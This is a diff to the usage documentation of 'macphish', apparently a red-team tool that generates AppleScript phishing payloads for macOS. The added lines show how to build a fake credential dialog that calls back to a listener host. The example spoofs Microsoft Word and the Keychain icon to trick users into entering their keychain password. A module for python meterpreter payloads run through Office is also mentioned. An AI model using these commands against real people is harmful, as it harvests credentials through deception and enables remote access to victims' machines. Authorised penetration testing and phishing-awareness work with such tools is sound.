cldrn/macphish/USAGE.md

 To generate the Applescript payload to be executed from a shell:

     $./macphish.py -a creds -lh <host>

+To customize the icon, title and message used in the dialog:

+    ./macphish.py -lh <host> -a creds -t <title> -msg <msg> -i <icon>

+For example, to use the keychain icon:

+    ./macphish.py -lh 0xdead -a creds -t "Microsoft Word" -msg "Unlock your keychain to decrypt this file" -i "file \"Applications:Utilities:Keychain Access.app:Contents:Resources:AppIcon.icns\""

 ## meterpreter (Office 2011/Office 2016 with limitations)
 This module generates python meterpreter payloads.
 In Office 2016, it will run inside the App Sandbox.